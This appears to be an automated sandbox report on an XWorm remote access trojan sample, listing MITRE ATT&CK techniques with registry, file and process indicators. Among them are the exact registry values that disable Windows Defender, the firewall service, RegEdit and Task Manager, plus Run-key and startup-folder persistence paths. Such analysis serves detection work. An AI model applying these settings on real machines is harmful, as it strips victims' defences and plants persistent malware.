xworm | 159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2344	bcdedit.exe
3944	bcdedit.exe
5804	bcdedit.exe
484	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5484	powershell.exe
4632	powershell.exe
6076	powershell.exe
6128	powershell.exe
4392	powershell.exe
4928	powershell.exe
6032	powershell.exe
4560	powershell.exe
4176	powershell.exe
4608	powershell.exe
1612	powershell.exe
4936	powershell.exe
4360	powershell.exe
2392	powershell.exe
2400	powershell.exe
3776	powershell.exe
5516	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 15 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5996	netsh.exe
1416	netsh.exe
888	netsh.exe
5768	netsh.exe

Possible privilege escalation attempt 32 IoCs

exploit

pid	Process
2924	takeown.exe
4228	icacls.exe
1352	icacls.exe
4832	takeown.exe
4300	takeown.exe
3128	takeown.exe
4496	takeown.exe
1248	takeown.exe
4612	takeown.exe
5188	icacls.exe
2276	icacls.exe
3068	takeown.exe
2844	icacls.exe
3128	icacls.exe
4332	icacls.exe
4196	takeown.exe
916	takeown.exe
5776	takeown.exe
4060	takeown.exe
5400	takeown.exe
5480	icacls.exe
4816	icacls.exe
3772	takeown.exe
2856	icacls.exe
3804	takeown.exe
1836	takeown.exe
2020	icacls.exe
4816	icacls.exe
1140	takeown.exe
5144	icacls.exe
3584	icacls.exe
4284	takeown.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
3540	attrib.exe
4804	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe

Executes dropped EXE 4 IoCs

pid	Process
5888	Rasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
296	Windows Host Service.scr
6696	$77RealtekAudioDriverHost.exe

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5188	icacls.exe
5480	icacls.exe
2276	icacls.exe
3128	icacls.exe
1352	icacls.exe
3128	takeown.exe
2844	icacls.exe
4816	icacls.exe
2924	takeown.exe
4284	takeown.exe
4332	icacls.exe
5776	takeown.exe
3772	takeown.exe
5144	icacls.exe
5400	takeown.exe
4816	icacls.exe
3068	takeown.exe
4060	takeown.exe
4196	takeown.exe
916	takeown.exe
4300	takeown.exe
1836	takeown.exe
1248	takeown.exe
4612	takeown.exe
2020	icacls.exe
4832	takeown.exe
4496	takeown.exe
4228	icacls.exe
1140	takeown.exe
3804	takeown.exe
3584	icacls.exe
2856	icacls.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr"	Rasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
103	discord.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2400	powercfg.exe
5064	powercfg.exe
1728	powercfg.exe
3524	powercfg.exe
592	powercfg.exe
5000	powercfg.exe
2776	powercfg.exe
1504	powercfg.exe
4540	powercfg.exe
3740	powercfg.exe
5992	powercfg.exe
292	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File created	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File created	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\SystemTemp	Process not Found

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
244	sc.exe
2688	sc.exe
5736	sc.exe
3672	sc.exe
3260	sc.exe
2264	sc.exe
4896	sc.exe
396	sc.exe
2252	sc.exe
4172	sc.exe
3004	sc.exe
2276	sc.exe
3984	sc.exe
4676	sc.exe
3160	sc.exe
2784	sc.exe
4060	sc.exe
3736	sc.exe
1144	sc.exe
5360	sc.exe
2168	sc.exe
3660	sc.exe
3712	sc.exe
6000	sc.exe
3736	sc.exe
3740	sc.exe
4624	sc.exe
5100	sc.exe
4392	sc.exe
1580	sc.exe
3888	sc.exe
5160	sc.exe
5952	sc.exe
3920	sc.exe
3824	sc.exe
4104	sc.exe
5748	sc.exe
4548	sc.exe
2916	sc.exe
2544	sc.exe
4284	sc.exe
3532	sc.exe
5028	sc.exe
3844	sc.exe
424	sc.exe
2112	sc.exe
1756	sc.exe
5616	sc.exe
2352	sc.exe
1140	sc.exe
3192	sc.exe
1136	sc.exe
3768	sc.exe
5984	sc.exe
2008	sc.exe
5192	sc.exe
3192	sc.exe
5992	sc.exe
2440	sc.exe
4488	sc.exe
3656	sc.exe
5068	sc.exe
3572	sc.exe
5096	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	powercfg.exe
